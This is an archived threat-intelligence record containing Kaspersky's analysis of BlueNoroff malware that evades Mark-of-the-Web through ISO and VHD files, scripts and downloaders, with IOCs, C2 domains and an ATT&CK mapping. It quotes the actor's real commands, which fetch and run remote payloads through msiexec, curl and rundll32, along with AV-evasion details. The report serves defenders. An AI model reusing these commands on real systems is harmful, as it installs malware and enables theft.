{
	"id": "c610d7f0-a1d0-40ce-880f-18345719a3c5",
	"created_at": "2026-04-06T00:12:43.013673Z",
	"updated_at": "2026-04-12T02:21:13.269519Z",
	"deleted_at": null,
	"sha1_hash": "a32de70007629718b37895834b71c889798328b0",
	"title": "BlueNoroff introduces new methods bypassing MoTW",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2246546,
	"plain_text": "BlueNoroff introduces new methods bypassing MoTW\r\nBy Seongsu Park\r\nPublished: 2022-12-27 · Archived: 2026-04-05 16:06:56 UTC\r\nBlueNoroff group is a financially motivated threat actor eager to profit from its cyberattack capabilities. We have\r\npublished technical details of how this notorious group steals cryptocurrency before. We continue to track the\r\ngroup’s activities and this October we observed the adoption of new malware strains in its arsenal. The group\r\nusually takes advantage of Word documents and uses shortcut files for the initial intrusion. However, it has\r\nrecently started to adopt new methods of malware delivery.\r\nThe first new method the group adopted is aimed at evading the Mark-of-the-Web (MOTW) flag, the security\r\nmeasure whereby Windows displays a warning message when the user tries to open a file downloaded from the\r\ninternet. To do this, optical disk image (.iso extension) and virtual hard disk (.vhd extension) file formats were\r\nused. This is a common tactic used nowadays to evade MOTW, and BlueNoroff has also adopted it.\r\nIn addition, the group tested different file types to refine malware delivery methods. We observed a new Visual\r\nBasic Script, a previously unseen Windows Batch file, and a Windows executable. It seems the actors behind\r\nBlueNoroff are expanding or experimenting with new file types to convey their malware efficiently.\r\nAfter researching the infrastructure that was utilized, we discovered more than 70 domains used by this group,\r\nmeaning they were very active until recently. Also, they created numerous fake domains that look like venture\r\ncapital and bank domains. 
Most of the domains imitate Japanese venture capital companies, indicating that the\r\ngroup has an extensive interest in Japanese financial entities.\r\nExecutive summary\r\nBlueNoroff group introduced new file types to evade Mark-of-the-Web (MOTW) security measures;\r\nBlueNoroff group expanded file types and tweaked infection methods;\r\nBlueNoroff created numerous fake domains impersonating venture capital companies and banks.\r\nBackground\r\nAt the end of September 2022, we observed new BlueNoroff malware in our telemetry. After a careful\r\ninvestigation, we confirmed that the actor had adopted new techniques to convey the final payload. The actor took\r\nadvantage of several scripts, including Visual Basic Script and Windows Batch script. They also started using disk\r\nimage file formats, .iso and .vhd, to deliver their malware. For intermediate infection, the actor introduced a\r\ndownloader to fetch and spawn the next stage payload. Although the initial intrusion methods were very different\r\nin this campaign, the final payload that we had analyzed previously was used without significant changes.\r\nhttps://securelist.com/bluenoroff-methods-bypass-motw/108383/\r\nPage 1 of 12\n\nNovel infection chain\r\nLong-lasting initial infection\r\nBased on our telemetry, we observed that one victim in the UAE was attacked using a malicious Word document.\r\nThe victim received a document file named “Shamjit Client Details Form.doc” on September 2, 2022.\r\nUnfortunately, we couldn’t acquire the document, but it was executed from the following path:\r\nC:\\Users\\[username]\\Desktop\\SALES OPS [redacted]\\[redacted]\\Signed Forms \u0026 Income Docs\\Shamjit Client Details Form.doc\r\nJudging from the file path, we can assume that the victim was an employee in the sales department responsible for\r\nsigning contracts.\r\nUpon launch, the malicious document connects to the remote server and downloads the payload. 
In this particular\r\ncase, the executable ieinstal.exe was used to bypass UAC.\r\nRemote URL: https://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=\r\nCreated payload path: %Profile%\\cr.dat\r\nSpawned command: cmd.exe %Profile%\\cr.dat 5pKwgIV5otiKb6JrNddaVJOaLjMkj4zED238vIU=\r\nAfter initial infection, we observed several hands-on-keyboard activities by the operator. Through the implanted\r\nbackdoor, they attempted to fingerprint the victim and install additional malware with high privileges. Upon\r\ninfection, the operator executed several Windows commands to gather basic system information. They then\r\nreturned 18 hours later to install further malware with high privileges.\r\nPost-exploitation\r\nBased on our telemetry, when the malicious Word document opens it fetches the next payload from the remote\r\nserver:\r\nDownload URL: http://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=\r\nThe fetched payload is supposed to be saved in %Profile%\\update.dll. Eventually, the fetched file is spawned with\r\nthe following commands:\r\nCommand #1: rundll32.exe %Profile%\\update.dll,#1 5pOygIlrsNaAYqx8JNZSTouZNjo+j5XEFHzxqIIqpQ==\r\nCommand #2: rundll32.exe %Profile%\\update.dll,#1 5oGygYVhos+IaqBlNdFaVJSfMiwhh4LCDn4=\r\nOne of the other methods the BlueNoroff group usually uses is a ZIP archive with a shortcut file. The archive file\r\nwe recently discovered contained a password-protected decoy document and a shortcut file named\r\n“Password.txt.lnk”. This is a classic BlueNoroff strategy to persuade the victim to execute the malicious shortcut\r\nfile to acquire the decoy document’s password. 
The latest archive file (MD5\r\n1e3df8ee796fc8a13731c6de1aed0818) discovered has a Japanese file name, 新しいボーナススケジュール.zip\r\n(Japanese for “New bonus schedule”), indicating they were interested in Japanese targets.\r\nThe main difference from the previous shortcut sample was that it fetched an additional script payload (Visual\r\nBasic Script or HTML Application); also, a different method of fetching and executing the next stage payload was\r\nadopted at this time. The command below was executed when the victim double-clicked on the shortcut file:\r\ncmd.exe /c DeviceCredentialDeployment \u0026 echo jbusguid\u003e %APPDATA%\\Pass.txt \u0026 start %APPDATA%\\Pass.txt \u0026\u0026 FOR %i IN (%systemroot%\\system32\\msiexec.*) DO msiexec -c /Q /i hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd \u0026 timeout\r\nTo evade detection, the actor utilized Living Off the Land Binaries (LOLBins). The DeviceCredentialDeployment\r\nexecution is a well-known LOLBin used to hide the command window. The actor also abused the msiexec.exe\r\nfile to silently launch the fetched Windows Installer file.\r\nUpdated method #1: Tricks to evade MOTW flag\r\nWe observed that the actor examined different file types to deliver their malware. Recently, many threat actors\r\nhave adopted disk image files to avoid MOTW (Mark-of-the-Web). In a nutshell, MOTW is a mitigation technique\r\nintroduced by Microsoft. The NTFS file system marks a file downloaded from the internet, and Windows handles\r\nthe file in a safe way. For example, when a Microsoft Office file is fetched from the internet, the OS opens it in\r\nProtected View, which restricts the execution of the embedded macro. In order to avoid this mitigation technique,\r\nmore threat actors have started abusing ISO file types. The BlueNoroff group likely experimented with ISO image\r\nfiles to deliver their malware. 
Although it’s still under development, we mention this sample as an early warning.\r\nThis ISO image file contains one PowerPoint slide show and one Visual Basic Script.\r\nEmbedded files of ISO image\r\nThe Microsoft PowerPoint file contains a link. When the user clicks the link, it executes the 1.vbs file through the\r\nWScript process. When we checked the VBS file, it only generated an “ok” message, which suggests BlueNoroff\r\nis still experimenting with this method.\r\nBased on our other findings, we discovered an in-the-wild sample (MD5 a17e9fc78706431ffc8b3085380fe29f)\r\nfrom VirusTotal. At the time of analysis, this .vhd sample wasn’t detected by any antivirus. The virtual disk file\r\ncontains a decoy PDF file, a Windows executable file, and an encrypted Dump.bin file. The PDF and executable\r\nfiles have numerous spaces before the file extension to hide it and allay suspicions.\r\nFiles inside a VHD file\r\nThe Job_Description[spaces].exe file (MD5 931d0969654af3f77fc1dab9e2bd66b1) is a loader that loads the next\r\nstage payload. Upon launch, it copies the Dump.bin file to %Templates%\\war[current time][random\r\nvalue].bin (e.g., war166812964324445.bin). The Dump.bin has a modified PE header. The malware reads the first\r\nbyte of Dump.bin, 0xAF in this file, and decodes 0x3E8 bytes with that key. The decrypted data is the header of a\r\nPE file, which the malware writes back over the copied file to restore it. Eventually, it loads the decrypted DLL file by\r\ncalling its first export function.\r\nThe spawned downloader contains an encrypted configuration at the end of the file. The malware first acquires the\r\ntotal size of the configuration data and the length of the payload URL from the end of the file. They are located\r\nfour bytes and eight bytes from the end of the file, respectively. 
The malware decrypts the configuration data with\r\nthe RC4 algorithm using an embedded 64-byte key.\r\nRC4 key: 46 61 44 6D 38 43 74 42 48 37 57 36 36 30 77 6C 62 74 70 79 57 67 34 6A 79 4C 46 62 67 52\r\n33 49 76 52 77 36 45 64 46 38 49 47 36 36 37 64 30 54 45 69 6D 7A 54 69 5A 36 61 42 74 65 69 67 50 33\r\nRestored URL: hxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D\r\nStructure of configuration\r\nIn the case of another downloader, however, the payload URL was delivered using a command line parameter.\r\nAlso, some of the other downloaders (MD5 f766f97eb213d81bf15c02d4681c50a4) have functionality that checks\r\nthe working environment. If the size of physical memory is less than 2,147,483,648 bytes, the malware terminates\r\nexecution.\r\nInfection flow of downloader\r\nThis downloader checks for the names of the following antivirus vendors: Sophos, Kaspersky, Avast, Avira,\r\nBitdefender, TrendMicro, and Windows Defender. If TrendMicro, Bitdefender, or Windows Defender products\r\nare installed, the malware conducts a classic DLL unhooking trick intended to remove user-mode hooks from the\r\nsystem library. This evasion technique overwrites the .text section of the pre-loaded ntdll library with the freshly\r\nloaded one so that the hooked API entry points are restored to the original code. With this trick, the\r\nmalware can disable the functionalities of EDR/AV products. Next, the malware creates a mutex to avoid\r\nduplicate execution.\r\nMutex name: da9f0e7dc6c52044fa29bea5337b4792b8b873373ba99ad816d5c9f5f275f03f\r\nNext, the malware opens a PDF decoy document in the same directory. 
The decoy document masquerades as a job\r\noffer from a Japanese multinational bank.\r\nIf Windows Defender or Bitdefender Antivirus is installed on the victim’s computer, the malware executes itself\r\nwith the following commands:\r\nWindows Defender: cmd /c timeout /t 10 \u0026 Del /f /q \\”[current file name]\\” \u0026 attrib -s -h \\”[PDF decoy file]\\” \u0026 rundll32 \\”[current DLL file path]\\” #1\r\nBitdefender: cmd /c timeout /t 10 \u0026 rundll32 \\”[current DLL file path]\\” #1\r\nThe primary objective of this malware is to fetch the next stage payload. To do this, the malware uses the cURL\r\nlibrary, combining cURL commands depending on the antivirus installed.\r\nAvira or Avast installed: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da\r\nOther cases: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d dl\r\nNote that the user-agent name is “cur1-agent”, and the malware sends “da” POST data if the victim installed\r\nAvira or Avast; otherwise, the malware sends “dl” POST data. If the data fetched by the cURL command contains\r\n“\u003chtml\u003e” and “curl:”, the malware decrypts the payload with a delivered 64-byte RC4 key.\r\nIf Avira or Avast are installed, the malware saves the decrypted payload to “%TEMPLATES%\\marcoor.dll” and\r\nspawns it with the rundll32.exe command with the payload URL.\r\ncommand: exe %TEMPLATES%\\marcoor.dll #1 [payload URL]\r\nOtherwise, the malware doesn’t write the payload to a file and injects the fetched payload into the explorer.exe\r\nprocess. The fetched payload is a DLL type executable and its export function is spawned with the “payload\r\nURL”.\r\nUnfortunately, we haven’t been able to obtain a precise infection chain so far. From our telemetry, however, we\r\ncan confirm the victim was eventually compromised by backdoor-type malware. 
Based on the malware’s static\r\ninformation, and parts of the internal code, we assess that the final payload is still very similar to the Persistence\r\nBackdoor #2[1] we described in our previous blog.\r\nUpdated method #2: Scripts and novel downloader\r\nAdditionally, we observed the download and launch of a suspicious batch file. The actor abused different\r\nLOLBins. The malware execution is done using a legitimate script, SyncAppvPublishingServer.vbs, in the system\r\nfolder. This script is for executing the PowerShell script via a Windows scheduled task.\r\nWScript.exe \"%system32%\\SyncAppvPublishingServer.vbs\"  \"n;cmd.exe '/c curl perseus.bond/Dgy_0dU08lC/hCHEdlDFGV/P89bXhClww/uiOHK5H35B/bM%3D -A cur1-agent -o %public%\\regsile.bat \u0026 start /b %public%\\regsile.bat'\r\nWe also observed the context around that batch file in our telemetry. The batch file name is “What is\r\nBlockchain.bat”. As the file name suggests, this group still targets the blockchain industry. We acquired the\r\nscriptlet of the batch file.\r\nxcopy /h /y /q How-To-Extension.pdf c:\\users\\public\\Inproc.exe*\r\nstart xcopy /h /y /q Blockchain-old.pdf c:\\users\\public\\rwinsta.exe*\r\nstart c:\\users\\public\\Inproc.exe \"%cd%\\Blockchain.pdf\"\r\nThe Inproc.exe is a legitimate mshta.exe file (MD5 0b4340ed812dc82ce636c00fa5c9bef2), and the rwinsta.exe is\r\na legitimate rundll32.exe file (MD5 ef3179d498793bf4234f708d3be28633). The Blockchain.pdf file is a\r\nmalicious HTML application file spawned by the mshta.exe process. 
Unfortunately, we don’t have the HTA script\r\n(Blockchain.pdf), but we can assume the functionality of the script based on our telemetry – showing the decoy\r\ndocument and fetching the next stage payload.\r\n# Create a decoy password file and open it.\r\ncmd.exe\" /c echo {PASSWORD}\u003e%documents%\\Userlink \u0026 notepad.exe %documents%\\Userlink\r\n# Fetch the payload with cURL command and execute.\r\ncmd.exe\" /c timeout 10 \u0026 curl perseus.bond/VcIf1hLJopY/shU_pJgW2Y/NX4SoGYuka/iiOHK5H35B/bM%3D -s -d md -A cur1-agent -o %documents%\\macroor.dll\u0026 %documents%\\macroor.dll #1\r\nAlso, we observed this group introduce a new Windows executable-type downloader at this time. This malware\r\n(MD5 087407551649376d90d1743bac75aac8) spawns a fake password file while fetching a remote payload and\r\nexecuting it. Upon execution, it creates a fake file (wae.txt) to show a password composed of the string ‘password’\r\nand fetches a payload from the embedded URL and loads it. This scheme, showing a password via notepad.exe, is\r\na trick favored by the BlueNoroff group to avoid arousing the victim’s suspicion. Usually, the file contains\r\nthe password needed to open the supplied encrypted decoy document.\r\nSimple downloader with fake password file\r\nIt’s possible that the actor delivered the above Windows executable file in archive file format or disk image file\r\nformat with an encrypted decoy document.\r\nInfrastructure\r\nWhile carrying out this research we found several C2 servers used by the actor. All the servers are hosted by VPS\r\nvendors as usual and several of them were resolved to the same IP address. 
The domain registration could be\r\ntraced back to earlier in 2021, so this is an ongoing operation by the adversary.\r\nDomain | IP | ISP | ASN\r\nofferings.cloud, docs.azure-protection.cloud | 104.168.174.80 | Hostwinds LLC. | AS54290\r\nbankofamerica.us.org, perseus.bond, avid.lno-prima.lol | 104.168.249.50 | Hostwinds LLC. | AS54290\r\nofferings.cloud, perseus.bond, docs.azure-protection.cloud, avid.lno-prima.lol | 152.89.247.87 | combahton GmbH | AS30823\r\nofferings.cloud | 172.86.121.130 | HIVELOCITY | AS29802\r\nwww.capmarketreport.com | 149.28.247.34 | The Constant Company, LLC | AS20473\r\nms.msteam.biz, www.onlinecloud.cloud | 155.138.159.45 | The Constant Company, LLC | AS20473\r\nThe actor usually used fake domains that look like cloud hosting services for hosting malicious documents or payloads.\r\nThey also created fake domains disguised as legitimate companies in the financial industry and investment\r\ncompanies. The domains, including pivoted domains, imitate venture capital names or big bank names. 
Most of\r\nthe companies are Japanese companies, indicating the actor has a keen interest in Japanese markets.\r\nMalicious domains | Genuine company | Category of business | Country\r\nbeyondnextventures.co, cloud.beyondnextventures.co | Beyond Next Ventures (https://beyondnextventures.com) | Venture capital firm | Japan\r\nsmbc.ltd, smbcgroup.us, smbc-vc.com | Sumitomo Mitsui Banking Corporation (https://www.smbc.co.jp) | Japanese multinational banking and financial services | Japan\r\ncloud.mufg.tokyo, mufg.tokyo | Mitsubishi UFJ Financial Group (https://www.mufg.jp) | Bank in Japan | Japan\r\nvote.anobaka.info | ANOBAKA (https://anobaka.jp) | Venture capital firm | Japan\r\nit.zvc.capital | Z Venture Capital (https://zvc.vc) | Venture capital firm | Japan\r\nabf-cap.co | ABF Capital (https://www.abf-cap.com) | Venture capital firm | Japan\r\nangelbridge.capital | Angel Bridge (https://www.angelbridge.jp) | Venture capital firm | Japan\r\nmizuhogroup.us, careers.mizuhogroup.us | Mizuho Financial Group (https://www.mizuhogroup.com) | Banking holding company | Japan\r\nbankofamerica.tel, bankofamerica.nyc, bankofamerica.us.org | Bank of America (https://www.bankofamerica.com) | Bank and financial services holding company | USA\r\ntptf.us, tptf.ltd | Trans-Pacific Technology Fund (https://tptf.co) | Venture capital firm | Taiwan\r\nVictims\r\nAs we described in the section ‘Long-lasting initial infection’, we discovered that one victim in the UAE,\r\nprobably a home financing company, was compromised by classic BlueNoroff group malware. 
This financially\r\nmotivated threat actor has been attacking various cryptocurrency-related businesses lately, but also other financial\r\ncompanies, as in this case.\r\nIn addition, based on the domain naming and decoy documents, we assume, with low confidence, that the entities\r\nin Japan are on the radar of this group. In one PowerPoint sample, we observed that the actor took advantage of a\r\nJapanese venture capital company. Also, the samples we mentioned in the ‘Long-lasting initial infection’ section\r\nabove were delivered to the victim with a Japanese file name, suggesting the target can read Japanese.\r\nDecoy document\r\nConclusion\r\nAccording to a recent report, the BlueNoroff group stole cryptocurrency worth millions using their cyberattack\r\ncapabilities. It shows that this group has a strong financial motivation and actually succeeds in making profits\r\nfrom their cyberattacks. As we can see from our latest finding, this notorious actor has introduced slight\r\nmodifications to deliver their malware. This also suggests that attacks by this group are unlikely to decrease in the\r\nnear future.\r\nIndicators of compromise\r\nDownloader\r\n087407551649376d90d1743bac75aac8    regsile.exe\r\nCur1Agent downloader\r\nf766f97eb213d81bf15c02d4681c50a4\r\n61a227bf4c5c1514f5cbd2f37d98ef5b\r\n4c0fb06320d1b7ecf44ffd0442fc10ed\r\nd8f6290517c114e73e03ab30165098f6\r\nLoader\r\nd3503e87df528ce3b07ca6d94d1ba9fc    E:\\Readme.exe\r\n931d0969654af3f77fc1dab9e2bd66b1    Job_Description.       exe\r\nMalicious Virtual Disk File\r\na17e9fc78706431ffc8b3085380fe29f    Job_Description.vhd\r\nZip file and unzipped malicious shortcut\r\n1e3df8ee796fc8a13731c6de1aed0818    新しいボーナススケジュール.zip (New bonus schedule)\r\n21e9ddd5753363c9a1f36240f989d3a9    Password.txt.lnk\r\nURLs\r\nhxxp://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=\r\nhxxp://avid.lno-prima[.]lol/NafqhbXR7KC/rTVCtCpxPH/kMjTqFDDNt/fiOHK5H35B/bM%3D\r\nhxxp://offerings[.]cloud/NafqhbXR7KC/rTVCtCpxPH/pdQTpFN6FC/Lhr_wXGXix/nQ%3D\r\nhxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D\r\nhxxps://docs.azure-protection[.]cloud/%2BgFJKOpVX/4vRuFIaGlI/D%2BOfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D\r\nhxxps://docs.azure-protection[.]cloud/+gFJKOpVX/4vRuFIaGlI/D+OfpTtg/YTN0TU1BNx/bMA5aGuZZP/ODq7aFQ%3D/%3D\r\nhxxps://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=\r\nhxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd\r\nPivoted IP addresses\r\n152.89.247.87\r\n172.86.121.130\r\n104.168.174.80\r\nMITRE ATT\u0026CK Mapping\r\nTactic | Technique | Technique name\r\nInitial Access | T1566.001 | Phishing: Spearphishing Attachment\r\nInitial Access | T1566.002 | Phishing: Spearphishing Link\r\nExecution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell\r\nExecution | T1059.005 | Command and Scripting Interpreter: Visual Basic\r\nExecution | T1204.001 | User Execution: Malicious Link\r\nExecution | T1204.002 | User Execution: Malicious File\r\nPersistence | T1547.008 | Boot or Logon Autostart Execution: LSASS Driver\r\nDefense Evasion | T1027.002 | Obfuscated Files or Information: Software Packing\r\nDefense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks\r\nDefense Evasion | T1055.002 | Process Injection: Portable Executable Injection\r\nDefense Evasion | T1553.005 | Subvert Trust Controls: Mark-of-the-Web Bypass\r\nDefense Evasion | T1218.007 | System Binary Proxy Execution: Msiexec\r\nDefense Evasion | T1218.011 | System Binary Proxy Execution: Rundll32\r\nDefense Evasion | T1221 | Template Injection\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols\r\nExfiltration | T1041 | Exfiltration over C2 Channel\r\n[1] APT Intel report: BlueNoroff Launched a New Campaign To Attack Cryptocurrency Business\r\nSource: https://securelist.com/bluenoroff-methods-bypass-motw/108383/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
	],
	"report_names": [
		"108383"
	],
	"threat_actors": [
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-12T02:00:03.625347Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-12T02:00:03.096111Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Hidden Cobra",
				"Bluenoroff",
				"Nickel Academy",
				"G0032",
				"Hastati Group",
				"NewRomanic Cyber Army Team",
				"Operation AppleJeus",
				"APT-C-26",
				"ATK117",
				"Sapphire Sleet",
				"Lazarus group",
				"Group 77",
				"COVELLITE",
				"ATK3",
				"BeagleBoyz",
				"Operation Troy",
				"Whois Hacking Team",
				"NICKEL GLADSTONE",
				"DEV-0139",
				"COPERNICIUM",
				"Black Artemis",
				"Dark Seoul",
				"Subgroup: Bluenoroff",
				"Operation GhostSecret",
				"Diamond Sleet",
				"Operation DarkSeoul",
				"Labyrinth Chollima",
				"APT 38",
				"TA404",
				"Unit 121",
				"Bureau 121",
				"APT38",
				"Stardust Chollima",
				"G0082",
				"DEV-1222",
				"Andariel",
				"Appleworm",
				"Citrine Sleet",
				"Moonstone Sleet"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-12T02:00:04.416249Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-12T02:00:04.689937Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434363,
	"ts_updated_at": 1775960473,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a32de70007629718b37895834b71c889798328b0.pdf",
		"text": "https://archive.orkl.eu/a32de70007629718b37895834b71c889798328b0.txt",
		"img": "https://archive.orkl.eu/a32de70007629718b37895834b71c889798328b0.jpg"
	}
}